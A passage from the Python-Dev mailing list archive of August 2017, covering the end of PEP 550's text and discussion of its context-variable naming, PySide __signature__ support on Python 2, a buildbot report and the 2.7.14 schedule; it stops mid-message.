thank Elvis Pranskevichus and Victor Petrovykh for countless discussions around the topic and PEP proof reading and edits. Thanks to Nathaniel Smith for proposing the ``ContextKey`` design [17]_ [18]_, for pushing the PEP towards a more complete design, and coming up with the idea of having a stack of contexts in the thread state. Thanks to Nick Coghlan for numerous suggestions and ideas on the mailing list, and for coming up with a case that cause the complete rewrite of the initial PEP version [19]_. Version History =============== 1. Posted on 11-Aug-2017, view it here: [20]_. 2. Posted on 15-Aug-2017, view it here: [21]_. The fundamental limitation that caused a complete redesign of the first version was that it was not possible to implement an iterator that would interact with the EC in the same way as generators (see [19]_.) Version 2 was a complete rewrite, introducing new terminology (Local Context, Execution Context, Context Item) and new APIs. 3. Posted on 18-Aug-2017: the current version. Updates: * Local Context was renamed to Logical Context. The term "local" was ambiguous and conflicted with local name scopes. * Context Item was renamed to Context Key, see the thread with Nick Coghlan, Stefan Krah, and Yury Selivanov [22]_ for details. * Context Item get cache design was adjusted, per Nathaniel Smith's idea in [24]_. * Coroutines are created without a Logical Context; ceval loop no longer needs to special case the ``await`` expression (proposed by Nick Coghlan in [23]_.) * `Appendix: HAMT Performance`_ section was updated with more details about the proposed ``dict.copy()`` optimization and its limitations. References ========== .. [1] https://blog.golang.org/context .. [2] https://msdn.microsoft.com/en-us/library/system.threading.executioncontext.aspx .. [3] https://github.com/numpy/numpy/issues/9444 .. [4] http://bugs.python.org/issue31179 .. [5] https://en.wikipedia.org/wiki/Hash_array_mapped_trie .. [6] http://blog.higher-order.net/2010/08/16/assoc-and-clojures-persistenthashmap-part-ii.html .. [7] https://github.com/1st1/cpython/tree/hamt .. [8] https://michael.steindorfer.name/publications/oopsla15.pdf .. [9] https://gist.github.com/1st1/9004813d5576c96529527d44c5457dcd .. [10] https://gist.github.com/1st1/dbe27f2e14c30cce6f0b5fddfc8c437e .. [11] https://github.com/1st1/cpython/tree/pep550 .. [12] https://www.python.org/dev/peps/pep-0492/#async-await .. [13] https://github.com/MagicStack/uvloop/blob/master/examples/bench/echoserver.py .. [14] https://github.com/MagicStack/pgbench .. [15] https://github.com/python/performance .. [16] https://gist.github.com/1st1/6b7a614643f91ead3edf37c4451a6b4c .. [17] https://mail.python.org/pipermail/python-ideas/2017-August/046752.html .. [18] https://mail.python.org/pipermail/python-ideas/2017-August/046772.html .. [19] https://mail.python.org/pipermail/python-ideas/2017-August/046775.html .. [20] https://github.com/python/peps/blob/e8a06c9a790f39451d9e99e203b13b3ad73a1d01/pep-0550.rst .. [21] https://github.com/python/peps/blob/e3aa3b2b4e4e9967d28a10827eed1e9e5960c175/pep-0550.rst .. [22] https://mail.python.org/pipermail/python-ideas/2017-August/046801.html .. [23] https://mail.python.org/pipermail/python-ideas/2017-August/046790.html .. [24] https://mail.python.org/pipermail/python-ideas/2017-August/046786.html Copyright ========= This document has been placed in the public domain. From ncoghlan at gmail.com Sat Aug 19 03:37:06 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Sat, 19 Aug 2017 17:37:06 +1000 Subject: [Python-Dev] __signature__ for PySide ready In-Reply-To: References: Message-ID: On 19 August 2017 at 02:55, Jelle Zijlstra wrote: > 2017-08-18 18:20 GMT+02:00 Yury Selivanov : >> There's a backport of signature API to Python 2. Although last time I >> checked it was fairly outdated. >> > I wrote a backport earlier this year: https://pypi.python.org/pypi/inspect2. Nice. Yury was probably referring to https://funcsigs.readthedocs.io/, which is a partial backport specifically of inspect.Signature and friends. Either way, the answer to Christian's original question is that "Yes, supporting __signature__ is also useful in Python 2.x", as even though the native inspect module doesn't support it, 3rd party backports do. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Sat Aug 19 04:17:31 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Sat, 19 Aug 2017 18:17:31 +1000 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: Message-ID: On 19 August 2017 at 06:33, Yury Selivanov wrote: > Hi, > > This is a third iteration of the PEP. > > There was some really good feedback on python-ideas and > the discussion thread became hard to follow again, so I decided to > update the PEP only three days after I published the previous > version. > > Summary of the changes can be found in the "Version History" > section: https://www.python.org/dev/peps/pep-0550/#version-history > > There are a few open questions left, namely the terminology > and design of ContextKey API. On the former topic, I'm quite > happy with the latest version: Execution Context, Logical > Context, and Context Key. Nice, I quite like this version of the naming scheme and the core design in general. While Guido has a point using the same noun for two different things being somewhat confusing, I think the parallel here is the one between the local scope and the lexical (nonlocal) scope for variable names - just as your lexical scope is a nested stack of local scopes in outer functions, your execution context is your current logical context plus a nested stack of outer logical contexts. > Generator Object Modifications > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > To achieve this, we make a small set of modifications to the > generator object: > > * New ``__logical_context__`` attribute. This attribute is readable > and writable for Python code. > > * When a generator object is instantiated its ``__logical_context__`` > is initialized with an empty ``LogicalContext``. > > * Generator's ``.send()`` and ``.throw()`` methods are modified as > follows (in pseudo-C):: > > if gen.__logical_context__ is not NULL: > tstate = PyThreadState_Get() > > tstate.execution_context.push(gen.__logical_context__) > > try: > # Perform the actual `Generator.send()` or > # `Generator.throw()` call. > return gen.send(...) > finally: > gen.__logical_context__ = tstate.execution_context.pop() > else: > # Perform the actual `Generator.send()` or > # `Generator.throw()` call. > return gen.send(...) I think this pseudo-code expansion includes a few holdovers from the original visibly-immutable API design. Given the changes since then, I think this would be clearer if the first branch used sys.run_with_logical_context(), since the logical context references at the Python layer now behave like shared mutable objects, and the apparent immutability of sys.run_with_execution_context() comes from injecting a fresh logical context every time. Also +1 to the new design considerations questions that explicitly postpones consideration of any of my "What about..."" questions from python-ideas to future PEPs. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From tismer at stackless.com Sat Aug 19 04:38:37 2017 From: tismer at stackless.com (Christian Tismer) Date: Sat, 19 Aug 2017 10:38:37 +0200 Subject: [Python-Dev] __signature__ for PySide ready In-Reply-To: References: Message-ID: <358d5a13-f462-6297-6092-7c5dc5ce234d@stackless.com> Hi Nick, On 19.08.17 09:37, Nick Coghlan wrote: > On 19 August 2017 at 02:55, Jelle Zijlstra wrote: >> 2017-08-18 18:20 GMT+02:00 Yury Selivanov : >>> There's a backport of signature API to Python 2. Although last time I >>> checked it was fairly outdated. >>> >> I wrote a backport earlier this year: https://pypi.python.org/pypi/inspect2. > > Nice. > > Yury was probably referring to https://funcsigs.readthedocs.io/, which > is a partial backport specifically of inspect.Signature and friends. > > Either way, the answer to Christian's original question is that "Yes, > supporting __signature__ is also useful in Python 2.x", as even though > the native inspect module doesn't support it, 3rd party backports do. I did not use a backport, but simply hacked it together, myself: - Take the signature part of Python 3.6 out, - Adjust the syntax to Python 2.7. The hairy part was my way to create the PySide PyCFunction objects in a compatible way like Python 3 does it: the handling of PyCFunction's "self" parameter is different (holds type info, Python 2 does not). That needed much more internal knowledge as intended... Well, I thought the existence of __signature__ might be a good reason to switch to Python 3, but if I support Python 2, the advantage is gone. But if it's ok with you, then I'll publish both versions. Thanks a lot for the feedback. Ciao - Chris -- Christian Tismer :^) tismer at stackless.com Software Consulting : http://www.stackless.com/ Karl-Liebknecht-Str. 121 : https://github.com/PySide 14482 Potsdam : GPG key -> 0xFB7BEE0E phone +49 173 24 18 776 fax +49 (30) 700143-0023 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: OpenPGP digital signature URL: From solipsis at pitrou.net Sat Aug 19 04:40:18 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Sat, 19 Aug 2017 10:40:18 +0200 Subject: [Python-Dev] PEP 550 v3 References: Message-ID: <20170819104018.4353509c@fsol> On Fri, 18 Aug 2017 16:33:27 -0400 Yury Selivanov wrote: > > There are a few open questions left, namely the terminology > and design of ContextKey API. On the former topic, I'm quite > happy with the latest version: Execution Context, Logical > Context, and Context Key. I don't really like it. "Logical Context" is vague (there are lots of things called "context" in other libraries, so a bit of specificity would help avoid confusion), and it's not clear what is "logical" about it anyway. "Local Context" actually seemed better to me (as it reminded of threading.local() or the general notion of thread-local storage). Regards Antoine. From tismer at stackless.com Sat Aug 19 04:54:17 2017 From: tismer at stackless.com (Christian Tismer) Date: Sat, 19 Aug 2017 10:54:17 +0200 Subject: [Python-Dev] __signature__ for PySide ready In-Reply-To: References: Message-ID: <8074edfb-1cb9-a869-6656-edc440b7d0f9@stackless.com> Hi Brett, On 18.08.17 18:31, Brett Cannon wrote: > > > On Fri, 18 Aug 2017 at 02:05 Christian Tismer > wrote: > ... > Is it a bad idea to support signatures in Python 2 as well? > Do I introduce a feature that should not exist in Python 2? > Or is it fine to do so? > > Please let me know your opinion, I am happy with any result. > > > If you're getting paid to do the port then I don't think it really hurts > anything since it isn't going to magically open Python 2 to more usage. > In fact, if you are filling in the annotation information so that type > hints are being exposed then maybe there's a chance it might help > someone port to Python 3? Well, I took extra precautions to make sure that existing PyCFunctions are not affected in any way. The new types are clones of the original types, and only PySide sees the additional attribute for it's functions. So, no, I don not create magically signatures for Python 2 functions. But I really warned my customer that the feature might not be welcomed for Python 2, and we might only enable it internally for testing. As said, I'm happy with either answer. Cheers -- Chris -- Christian Tismer :^) tismer at stackless.com Software Consulting : http://www.stackless.com/ Karl-Liebknecht-Str. 121 : https://github.com/PySide 14482 Potsdam : GPG key -> 0xFB7BEE0E phone +49 173 24 18 776 fax +49 (30) 700143-0023 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: OpenPGP digital signature URL: From ncoghlan at gmail.com Sat Aug 19 06:33:27 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Sat, 19 Aug 2017 20:33:27 +1000 Subject: [Python-Dev] __signature__ for PySide ready In-Reply-To: <358d5a13-f462-6297-6092-7c5dc5ce234d@stackless.com> References: <358d5a13-f462-6297-6092-7c5dc5ce234d@stackless.com> Message-ID: On 19 August 2017 at 18:38, Christian Tismer wrote: > On 19.08.17 09:37, Nick Coghlan wrote: >> Either way, the answer to Christian's original question is that "Yes, >> supporting __signature__ is also useful in Python 2.x", as even though >> the native inspect module doesn't support it, 3rd party backports do. > > I did not use a backport, but simply hacked it together, myself: > > - Take the signature part of Python 3.6 out, > - Adjust the syntax to Python 2.7. The backports we're talking about are the ones that can *read* __signature__ attributes, as well as synthesise them from the underlying attributes on Python level functions and code objects. > The hairy part was my way to create the PySide PyCFunction objects in > a compatible way like Python 3 does it: the handling of PyCFunction's > "self" parameter is different (holds type info, Python 2 does not). > That needed much more internal knowledge as intended... > > Well, I thought the existence of __signature__ might be a good reason > to switch to Python 3, but if I support Python 2, the advantage > is gone. But if it's ok with you, then I'll publish both versions. The builtins and standard library extension modules in 2.7 will never gain signature information (since there's no equivalent of Argument Clinic to populate the __text_signature__ attributes). However, aside from it being extra work that they may not want to do, there's no particular reason for 3rd party modules to avoid providing better signatures in Python 2.x. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From brett at python.org Sat Aug 19 13:06:00 2017 From: brett at python.org (Brett Cannon) Date: Sat, 19 Aug 2017 17:06:00 +0000 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: <20170819104018.4353509c@fsol> References: <20170819104018.4353509c@fsol> Message-ID: On Sat, Aug 19, 2017, 01:43 Antoine Pitrou wrote: > On Fri, 18 Aug 2017 16:33:27 -0400 > Yury Selivanov wrote: > > > > There are a few open questions left, namely the terminology > > and design of ContextKey API. On the former topic, I'm quite > > happy with the latest version: Execution Context, Logical > > Context, and Context Key. > > I don't really like it. "Logical Context" is vague (there are > lots of things called "context" in other libraries, so a bit of > specificity would help avoid confusion), and it's not clear what is > "logical" about it anyway. "Local Context" actually seemed better to > me (as it reminded of threading.local() or the general notion of > thread-local storage). > > I have to admit that I didn't even pick up on that name change. I could go either way. I do appreciate dropping ContextItem, though, because "CI" makes me think of continuous integration. And the overall shape of the API for public consumption LGTM. -brett > > Regards > > Antoine. > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/brett%40python.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From brett at python.org Sat Aug 19 13:07:58 2017 From: brett at python.org (Brett Cannon) Date: Sat, 19 Aug 2017 17:07:58 +0000 Subject: [Python-Dev] Buildbot report, August 2017 In-Reply-To: References: Message-ID: Thanks for all of this, Victor! On Fri, Aug 18, 2017, 09:38 Victor Stinner wrote: > Hi, > > Here is a quick report of what changed recently on buildbots. > > > == pythoninfo == > > I added a new "python3 -m test.pythoninfo" command which is now run on > Travis CI, AppVeyor and buildbots. > > https://bugs.python.org/issue30871 > > This command dumps various informations to help debugging test > failures on our CIs. For example, you get the Tcl version, information > about the threading implementation, etc. > > Currently, pythoninfo is only run on the master branch, but I plan to > run it on Python 3.6 and 2.7 later. > > The pythoninfo idea comes from https://bugs.python.org/issue29854 when > we didn't know the readline version of a buildbot, and I didn't want > to put such information in regrtest header, since importing readline > has side effects. > > > == Removed buildbots == > > A few buildbots were removed: > > * All Python 3.5 buildbots was removed, since the 3.5 branch entered > the security only stage: > https://mail.python.org/pipermail/python-dev/2017-August/148794.html > > * FreeBSD 9-STABLE (koobs-freebsd9): FreeBSD 9 is no more supported > upstream, use FreeBSD 10 and FreeBSD CURRENT buildbots > > * OpenIndiana: was offline since the beginning of June. Previous > discussions on > this list: > > * September 2016: OpenIndiana and Solaris support > > https://mail.python.org/pipermail/python-dev/2016-September/146538.html > * April 2015: MemoryError and other bugs on AMD64 OpenIndiana 3.x > https://mail.python.org/pipermail/python-dev/2015-April/138967.html > * September 2014: Sad status of Python 3.x buildbots > > https://mail.python.org/pipermail/python-dev/2014-September/136175.html > > * intel-ubuntu-skylake: Florin Papa wrote me that the machine became > unavailable in December 2016. > > * Yosemite ICC buildbot (intel-yosemite-icc): it was maintained by Zachary > Ware > and R. David Murray. Sadly, David lost the VM image to a disk crash :-( > New > ICC buildbots may come back later, wait & see ;-) > > * macOS Snow Leopard (murray-snowleopard): this old machine was stuck > at boot for an unknown reason. "It's an old machine, and it is > probably time to get rid of it." wrote R. David Murray :-) > > > == Reduced failure rate == > > As usual, many race conditions were fixed in tests and in the code, to > reduce the buildbot failure rate. > > I may list them in a blog post, later. > > > == What's Next? == > > * Buildbot should be upgrade to buildbot 0.9: > https://github.com/python/buildmaster-config/pull/12 > > * Zachary Ware plans to rewrite our buildbot configuration during the > CPython sprint (Sept 4-9) > > * test_logging fails randomly on FreeBSD 10 with a warning related to > threads (bpo-30830). I was trying to reproduce the bug since 2 months. > I just identified to root bug! https://bugs.python.org/issue31233 > "socketserver.ThreadingMixIn leaks running threads after > server_close()". > > * The "Docs" buildbot (currently offline) may be dropped as well, > https://github.com/python/buildmaster-config/pull/21 > > > See also my previous buildbot report: > https://haypo.github.io/python-buildbots-2017q2.html > > Victor > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/brett%40python.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ethan at stoneleaf.us Sat Aug 19 14:57:16 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sat, 19 Aug 2017 11:57:16 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: <20170819104018.4353509c@fsol> References: <20170819104018.4353509c@fsol> Message-ID: <59988A0C.30208@stoneleaf.us> On 08/19/2017 01:40 AM, Antoine Pitrou wrote: > On Fri, 18 Aug 2017 16:33:27 -0400 Yury Selivanov wrote: >> There are a few open questions left, namely the terminology >> and design of ContextKey API. On the former topic, I'm quite >> happy with the latest version: Execution Context, Logical >> Context, and Context Key. > > I don't really like it. "Logical Context" is vague (there are > lots of things called "context" in other libraries, so a bit of > specificity would help avoid confusion), and it's not clear what is > "logical" about it anyway. "Local Context" actually seemed better to > me (as it reminded of threading.local() or the general notion of > thread-local storage). I am also not seeing the link between "logical" and "this local layer of environmental changes that won't be seen by those who called me". Maybe ContextLayer? Or marry the two and call it LocalContextLayer. -- ~Ethan~ From gvanrossum at gmail.com Sat Aug 19 20:21:03 2017 From: gvanrossum at gmail.com (Guido van Rossum) Date: Sat, 19 Aug 2017 17:21:03 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: <59988A0C.30208@stoneleaf.us> References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> Message-ID: The way we came to "logical context" was via "logical thread (of control)", which is distinct from OS thread. But I think we might need to search for another term... On Aug 19, 2017 11:56 AM, "Ethan Furman" wrote: > On 08/19/2017 01:40 AM, Antoine Pitrou wrote: > >> On Fri, 18 Aug 2017 16:33:27 -0400 Yury Selivanov wrote: >> > > There are a few open questions left, namely the terminology >>> and design of ContextKey API. On the former topic, I'm quite >>> happy with the latest version: Execution Context, Logical >>> Context, and Context Key. >>> >> >> I don't really like it. "Logical Context" is vague (there are >> lots of things called "context" in other libraries, so a bit of >> specificity would help avoid confusion), and it's not clear what is >> "logical" about it anyway. "Local Context" actually seemed better to >> me (as it reminded of threading.local() or the general notion of >> thread-local storage). >> > > I am also not seeing the link between "logical" and "this local layer of > environmental changes that won't be seen by those who called me". > > Maybe ContextLayer? Or marry the two and call it LocalContextLayer. > > -- > ~Ethan~ > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/guido% > 40python.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ncoghlan at gmail.com Sun Aug 20 01:41:36 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Sun, 20 Aug 2017 15:41:36 +1000 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> Message-ID: On 20 August 2017 at 10:21, Guido van Rossum wrote: > The way we came to "logical context" was via "logical thread (of control)", > which is distinct from OS thread. But I think we might need to search for > another term... Right. Framing it in pragmatic terms, the two entities that we're attempting to name are: 1. The mutable storage that ContextKey.set() writes to 2. The dynamic context that ContextKey.get() queries Right now, we're using ExecutionContext for the latter, and LogicalContext for the former, and I can definitely see Antoine's point that those names don't inherently convey any information about which is which. Personally, I still like the idea of moving ExecutionContext into the "mutable storage" role, and then finding some other name for the stack of execution contexts that ck.get() queries. For example, if we named the latter after what it's *for*, we could call it the DynamicQueryContext, and end up with the following invocation functions: # Replacing ExecutionContext in the current PEP DynamicQueryContext sys.get_dynamic_query_context() sys.new_dynamic_query_context() sys.run_with_dynamic_query_context() # Suggests immutability -> good! # Suggests connection to ck.get() -> good! # Replacing LogicalContext in the current PEP ExecutionContext sys.new_execution_context() sys.run_with_execution_context() __execution_context__ attribute on generators (et al) # Neutral on mutability/immutability # Neutral on ck.set()/ck.get() An alternative would be to dispense with the ExecutionContext name entirely, and instead use DynamicWriteContext and DynamicQueryContext. If we did that, I'd suggest omitting "dynamic" from the function and attribute names (while keeping it on the types), and end up with: # Replacing ExecutionContext in the current PEP DynamicQueryContext sys.get_query_context() sys.new_query_context() sys.run_with_query_context() # Suggests immutability -> good! # Suggests connection to ck.get() -> good! # Replacing LogicalContext in the current PEP DynamicWriteContext sys.new_write_context() sys.run_with_write_context() __write_context__ attribute on generators (et al) # Suggests mutability -> good! # Suggests connection to ck.set() -> good! In this variant, the phrase "execution context" could become a general term that covered *all* of the active state that a running piece of code has access to (the dynamic context, thread locals, closure variables, module globals, process globals, etc), rather than referring to any particular runtime entity. Cheers, Nick. P.S. Since we have LookupError (rather than QueryError) as the shared base exception type for KeyError and IndexError, it would also be entirely reasonable to replace "Query" in the above suggestions with "Lookup" (DynamicLookupContext, sys.get_lookup_context(), etc). That would also have the benefit of being less jargony, and more like conversational English. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ethan at stoneleaf.us Sun Aug 20 04:18:13 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sun, 20 Aug 2017 01:18:13 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> Message-ID: <599945C5.1030300@stoneleaf.us> On 08/19/2017 10:41 PM, Nick Coghlan wrote: > On 20 August 2017 at 10:21, Guido van Rossum wrote: >> The way we came to "logical context" was via "logical thread (of control)", >> which is distinct from OS thread. But I think we might need to search for >> another term... > > Right. Framing it in pragmatic terms, the two entities that we're > attempting to name are: > > 1. The mutable storage that ContextKey.set() writes to > 2. The dynamic context that ContextKey.get() queries > > Right now, we're using ExecutionContext for the latter, and > LogicalContext for the former, and I can definitely see Antoine's > point that those names don't inherently convey any information about > which is which. > [snip] > # Replacing ExecutionContext in the current PEP > DynamicQueryContext > sys.get_dynamic_query_context() > sys.new_dynamic_query_context() > sys.run_with_dynamic_query_context() > # Suggests immutability -> good! > # Suggests connection to ck.get() -> good! > > # Replacing LogicalContext in the current PEP > ExecutionContext > sys.new_execution_context() > sys.run_with_execution_context() > __execution_context__ attribute on generators (et al) > # Neutral on mutability/immutability > # Neutral on ck.set()/ck.get() >[snippety snip] > # Replacing ExecutionContext in the current PEP > DynamicQueryContext > sys.get_query_context() > sys.new_query_context() > sys.run_with_query_context() > # Suggests immutability -> good! > # Suggests connection to ck.get() -> good! > > # Replacing LogicalContext in the current PEP > DynamicWriteContext > sys.new_write_context() > sys.run_with_write_context() > __write_context__ attribute on generators (et al) > # Suggests mutability -> good! > # Suggests connection to ck.set() -> good! This is just getting more confusing for me. Going back to Yury's original names for now... Relating this naming problem back to globals() and locals(), the correlation works okay for locals/LocalContext, but breaks down at the globals() level because globals() is a specific set of variables -- namely, module-level assignments, while ExecutionContext would be the equivalent of globals, nonlocals, and locals all together. A more accurate name for ExecutionContext might be ParentContext, but that would imply that the LocalContext is not included, and it is (if I finally understand what's going on, of course). So I like ExecutionContext for the stack of WhateverWeCallTheOtherContext contexts. But what do we call it? Again, if I understand what's going on, a normal, threadless, non-async, generator-bereft, plain vanilla Python program is going to have only one LocalContext no matter how many nor how deep the function call chain goes -- so in that sense Local isn't really the best word, but Context all by itself is /really/ unhelpful, and Local does imply "the most current Context Layer". Of all the names proposed so far, I think LocalContext is the best reminder of the thing that CK.key writes to. For the piled layers of LocalContexts that CK.key.get searches through, either ExecutionContext or perhaps ContextEnvironment or even ContextStack works for me (the stack portion not being an implementation detail, but a promise of how it effectively works). -- ~Ethan~ From solipsis at pitrou.net Sun Aug 20 06:07:11 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Sun, 20 Aug 2017 12:07:11 +0200 Subject: [Python-Dev] PEP 550 v3 References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> Message-ID: <20170820120711.3e876391@fsol> On Sat, 19 Aug 2017 17:21:03 -0700 Guido van Rossum wrote: > The way we came to "logical context" was via "logical thread (of control)", > which is distinct from OS thread. But I think we might need to search for > another term... Perhaps "task context"? A "task" might be a logical thread, OS thread, or anything else that deserves a distinct set of implicit parameters. Regards Antoine. From francismb at email.de Sun Aug 20 06:39:00 2017 From: francismb at email.de (francismb) Date: Sun, 20 Aug 2017 12:39:00 +0200 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: Message-ID: <7cdb32ce-b609-a22c-ec82-1ced1f80e504@email.de> Hi Yury, On 08/18/2017 10:33 PM, Yury Selivanov wrote: > * ``.get()`` method: return the current EC value for the context key. > Context keys return ``None`` when the key is missing, so the method > never fails. Is the difference between `Key not found` and `value is None` important here? Thanks, --francis From benjamin at python.org Sun Aug 20 15:03:45 2017 From: benjamin at python.org (Benjamin Peterson) Date: Sun, 20 Aug 2017 12:03:45 -0700 Subject: [Python-Dev] 2.7.14 schedule Message-ID: <1503255825.3985080.1079284200.1E2B25D5@webmail.messagingengine.com> Hi all, I've set the 2.7.14 release schedule. There will be a release candidate on August 26 with a planned final for September 16. From brett at python.org Sun Aug 20 22:04:34 2017 From: brett at python.org (Brett Cannon) Date: Mon, 21 Aug 2017 02:04:34 +0000 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: <20170820120711.3e876391@fsol> References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Sun, Aug 20, 2017, 03:08 Antoine Pitrou wrote: > On Sat, 19 Aug 2017 17:21:03 -0700 > Guido van Rossum wrote: > > The way we came to "logical context" was via "logical thread (of > control)", > > which is distinct from OS thread. But I think we might need to search for > > another term... > > Perhaps "task context"? A "task" might be a logical thread, OS thread, > or anything else that deserves a distinct set of implicit parameters. > Maybe this is skirting too loose to the dynamic scoping, but maybe ContextFrame? This does start to line up with frames of execution which I know is a bit low-level, but then again most people will never need to know about this corner of Python. -brett > Regards > > Antoine. > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/brett%40python.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From guido at python.org Mon Aug 21 01:03:20 2017 From: guido at python.org (Guido van Rossum) Date: Sun, 20 Aug 2017 22:03:20 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: > > On Sun, Aug 20, 2017, 03:08 Antoine Pitrou wrote: > >> On Sat, 19 Aug 2017 17:21:03 -0700 >> Guido van Rossum wrote: >> > The way we came to "logical context" was via "logical thread (of >> control)", >> > which is distinct from OS thread. But I think we might need to search >> for >> > another term... >> >> Perhaps "task context"? A "task" might be a logical thread, OS thread, >> or anything else that deserves a distinct set of implicit parameters. >> > I think you're on to something here, though I hesitate to use "task" because asyncio.Task is a specific implementation of it. On Sun, Aug 20, 2017 at 7:04 PM, Brett Cannon wrote: > Maybe this is skirting too loose to the dynamic scoping, but maybe > ContextFrame? This does start to line up with frames of execution which I > know is a bit low-level, but then again most people will never need to know > about this corner of Python. > I've been thinking that the missing link here may be the execution stack. A logical thread (LT) has a "logical stack" (LS). While a thread of control is a fairly fuzzy concept (once you include things that aren't OS threads), an execution stack is a concrete object, even if not all logical threads represent their execution stack in the same way. For example, a suspended asyncio Task has a stack that is represented by a series of stack frames linked together by await (or yield from), and greenlet apparently uses a different representation again (their term is micro-thread -- maybe we could also do something with that?). Here's the result of some more thinking about this PEP that I've been doing while writing and rewriting this message (with a surprising ending). Let's say that the details of scheduling an LT and managing its mapping onto an LS is defined by a "framework". In this terminology, OS threads are a framework, as are generators, asyncio, and greenlet. There are potentially many different such frameworks. (Some others include Twisted, Tornado and concurrent.futures.ThreadPoolExecutor.) The PEP's big idea is to recognize that there are also many different, non-framework, libraries (e.g. Decimal or Flask) that need to associate some data with an LT. The PEP therefore proposes APIs that allow libraries to do this without caring about what framework is managing the LT, and vice versa (the framework doesn't have to care about how libraries use the per-LT data). The proposed APIs uses two sets of concepts: one set for the framework and one for the library. The library-facing API is simple: create a ContextKey (CK) instance as a global variable in the library, and use its get() and set() methods to access and manipulate the data for that library associated with the current logical thread (LT). Its role is similar to threading.local(), although the API and implementation are completely different, and threading.local() is tied to a specific framework (OS threads). For frameworks the API is more complicated. There are two new classes, LogicalContext (LC) and ExecutionContext (EC). The PEP gives pseudo code suggesting that LC is/contains a dict (whose items are (CK, value) pairs) and an EC is/contains a list of LCs. But in actuality that's only one possible implementation (and not the one proposed for CPython). The key idea is rather that a framework needs to be able to take the data associated with one LT and clone it as the starting point for the data associated for a new LT. This cloning is done by sys.get_execution_context(), and the PEP proposes to use a Hash Array Mapped Trie (HAMT) as the basis for the implementation of LC and EC, to make this cloning fast. IIUC it needs to be fast to match the speed with which many frameworks create and destroy their LTs. The PEP proposes a bunch of new functions in sys for frameworks to manipulate LCs and ECs and their association with the current OS-level thread. Note that OS threads are important here because in the end all frameworks build on top of them. Honestly I'm not sure we need the distinction between LC and EC. If you read carefully some of the given example code seems to confuse them. If we could get away with only a single framework-facing concept, I would be happy calling it ExecutionContext. (Another critique of the proposal I have is that it adds too many similarly-named functions to sys. But this email is already too long and I need to go to bed.) -- --Guido van Rossum (python.org/~guido ) -------------- next part -------------- An HTML attachment was scrubbed... URL: From jimjjewett at gmail.com Mon Aug 21 01:45:05 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Mon, 21 Aug 2017 01:45:05 -0400 Subject: [Python-Dev] PEP 550 v3 naming Message-ID: Building on Brett's suggestion: FrameContext: used in/writable by one frame ContextStack: a FrameContext and its various fallbacks -jJ From solipsis at pitrou.net Mon Aug 21 07:43:48 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Mon, 21 Aug 2017 13:43:48 +0200 Subject: [Python-Dev] PEP 550 v3 naming References: Message-ID: <20170821134348.155d17a1@fsol> On Mon, 21 Aug 2017 01:45:05 -0400 "Jim J. Jewett" wrote: > Building on Brett's suggestion: > > FrameContext: used in/writable by one frame It's not frame-specific, it's actually shared by an arbitrary number of frames (by default, all frames in a given thread). Regards Antoine. From ncoghlan at gmail.com Mon Aug 21 10:12:04 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 22 Aug 2017 00:12:04 +1000 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On 21 August 2017 at 15:03, Guido van Rossum wrote: > Honestly I'm not sure we need the distinction between LC and EC. If you read > carefully some of the given example code seems to confuse them. If we could > get away with only a single framework-facing concept, I would be happy > calling it ExecutionContext. Unfortunately, I don't think we can, and that's why I tried to reframe the discussion in terms of "Where ContextKey.set() writes to" and "Where ContextKey.get() looks things up". Consider the 